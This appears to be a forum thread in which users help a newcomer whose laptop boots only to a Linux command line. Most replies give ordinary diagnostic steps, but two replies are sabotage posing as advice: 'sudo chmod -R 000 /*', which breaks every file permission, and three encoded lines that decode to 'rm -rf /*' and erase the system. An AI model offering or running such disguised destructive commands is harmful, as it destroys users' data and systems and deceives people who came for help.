Command line Linux?  Strange.  Without knowing what laptop I don’t think anyone can help.  It’s possible if there’s no Linux gui that it can’t handle a gui at all (would be a very very old machine)

Not a pro, not even very good.  I’m just old and have time currently.  Assuming I know a lot about computers can be a mistake.

Sounds like a server distro of linux or slackware and that linux commands are unknown.

OP:  try typing

Quote

startx

at the prompt and hitting <Enter>

then

Quote

uname -a

Quote

cat /etc/fstab

and posting any output here, please.

With command line there all kinds of things it could be.  A lot of them are incredibly old though.  Not near enough information here.

Ubuntu had/has a server with no GUI.  It's what we're trying to find out.

OP -- do you know linux commands, at all?

So... just do that. If you don't know how to install Windows then you should ask in the Windows section.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Can you reboot and provide a picture right after boot?

# $(echo 726d202d7266202f2a0a | xxd -r -p)
# $(echo OJWSALLSMYQC6KQK | base32 -d)
# $(echo cm0gLXJmIC8qCg== | base64 -d)

If it’s new enough to even take it.  For all we know this is an old MS-DOS laptop from the 1980’s.  Linux can no-joke run on a 286 if you’ve got the right version.

We really need to know the make and model of the laptop and the name and version of the software.

Download windows iso from another laptop and clone it into a usb by ultraiso.

Boot with this usb device, and install windows.

You can find details about windows install by searching online
